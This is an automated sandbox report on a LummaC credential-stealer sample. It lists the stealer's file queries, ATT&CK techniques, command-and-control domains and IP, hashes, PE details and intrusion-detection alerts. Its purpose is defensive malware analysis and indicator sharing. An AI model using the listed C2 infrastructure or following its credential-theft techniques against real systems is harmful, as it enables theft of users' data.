              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2208047140.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2182520412.0000000001061000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2207678543.0000000001061000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2182548936.0000000001067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2194155395.0000000001061000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5536, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5536, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe45%ReversingLabsWin32.Infostealer.Tinba
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              crisiwarny.store
              		104.21.95.91
              		truetrue
                		unknown
                presticitpo.store
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  presticitpo.storetrue
                    		unknown
                    scriptyprefej.storetrue
                      		unknown
                      https://crisiwarny.store/apitrue
                        		unknown
                        necklacedmny.storetrue
                          		unknown
                          fadehairucw.storetrue
                            		unknown
                            navygenerayk.storetrue
                              		unknown
                              founpiuer.storetrue
                                		unknown
                                thumbystriw.storetrue
                                  		unknown
                                  crisiwarny.storetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://crisiwarny.store/apiifile.exe, 00000000.00000002.2277987160.0000000001083000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://crisiwarny.store/apifeMfile.exe, 00000000.00000003.2238094568.0000000001083000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://crisiwarny.store/apiefile.exe, 00000000.00000003.2194155395.0000000001061000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctafile.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://crisiwarny.store/_yfile.exe, 00000000.00000002.2277498147.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://crisiwarny.store/roxy-Authenticatfile.exe, 00000000.00000002.2277987160.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269328476.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://crisiwarny.store/=file.exe, 00000000.00000002.2277498147.0000000000FE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://crl.microfile.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269401849.0000000001007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://x1.c.lencr.org/0file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://x1.i.lencr.org/0file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://crisiwarny.store/apiFTfile.exe, 00000000.00000002.2277964213.000000000107D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://crisiwarny.store/ofile.exe, 00000000.00000002.2277498147.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://crisiwarny.store/apilafile.exe, 00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://crisiwarny.store/apizfile.exe, 00000000.00000003.2223402187.00000000057A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://crisiwarny.store/pfile.exe, 00000000.00000002.2277498147.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://crisiwarny.store/file.exe, 00000000.00000003.2238064199.0000000001085000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.21.95.91
                                                                    		crisiwarny.storeUnited States
                                                                    		13335CLOUDFLARENETUStrue

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1543431
                                                                    Start date and time:2024-10-27 21:05:11 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 19s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:4
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 1
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target file.exe, PID 5536 because there are no executed function
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: file.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    16:06:16API Interceptor9x Sleep call for process: file.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.21.95.91file.exeGet hashmaliciousLummaCBrowse
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                      file.exeGet hashmaliciousLummaCBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        crisiwarny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        MilkaCheats.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                        • 162.159.135.232
                                                                                        PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.0.5
                                                                                        SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        • 104.20.23.46
                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.31244.2279.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.1.5
                                                                                        SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.1.5
                                                                                        SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                                        • 104.20.4.235
                                                                                        SecuriteInfo.com.Win64.CrypterX-gen.31361.18171.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.0.5

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.95.91
                                                                                        K3SRs78CAv.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        MilkaCheats.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        No created / dropped files found

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.51700997618475
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:file.exe
                                                                                        File size:3'029'504 bytes
                                                                                        MD5:05b1942e139d61a022f421bdd45a33bb
                                                                                        SHA1:94b79e3e26b7ee47e8931720db0503e01d1b6070
                                                                                        SHA256:f75e3f83ef5ddb3809cbef6aab8ba643f1570564aceafdd7a99dcdc11d7e89c7
                                                                                        SHA512:86d92dc1ca046548bcf764ea0047d57c0b40f871b353371ea1184341ecb6dbdc7e376092272d281cd8457a2f9dc17a721cff772d9785aeab0ca041f2ff2813b9
                                                                                        SSDEEP:49152:cgG53reLfCbwFxUmnFUr28X5bCzIMs5phQX8c0:c753reLfCbwFxZfgbCNsDqsc0
                                                                                        TLSH:C5E52AA2A64979CFD58E1B788527DF83995C03B5073048C3E96D6D7A7D63CC036BAC28
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........P1...........@...........................1.....f.....@.................................T...h..

                                                                                        File Icon

                                                                                        Icon Hash:00928e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x715000
                                                                                        Entrypoint Section:.taggant
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp 00007FC71526A0BAh

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        0x10000x580000x27e00e1e8b0b94e12f56ea657ab75bf820f23False0.998114224137931data7.978933020723451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc 0x590000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        fvanlhxn0x5b0000x2b90000x2b840046774eda0e8b277a860e09796f4b96c5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        vsjzakbl0x3140000x10000x4000089f0b69f700e797419977289a332d4False0.787109375data6.140159833130769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .taggant0x3150000x30000x22000fa32d3fc4ee3ba6f919309840477122False0.06721047794117647DOS executable (COM)0.6977774190705611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                        Imports

                                                                                        DLLImport
                                                                                        kernel32.dlllstrcpy

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-27T21:06:18.315174+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.95.91443TCP
                                                                                        2024-10-27T21:06:18.315174+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.95.91443TCP
                                                                                        2024-10-27T21:06:19.528364+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.95.91443TCP
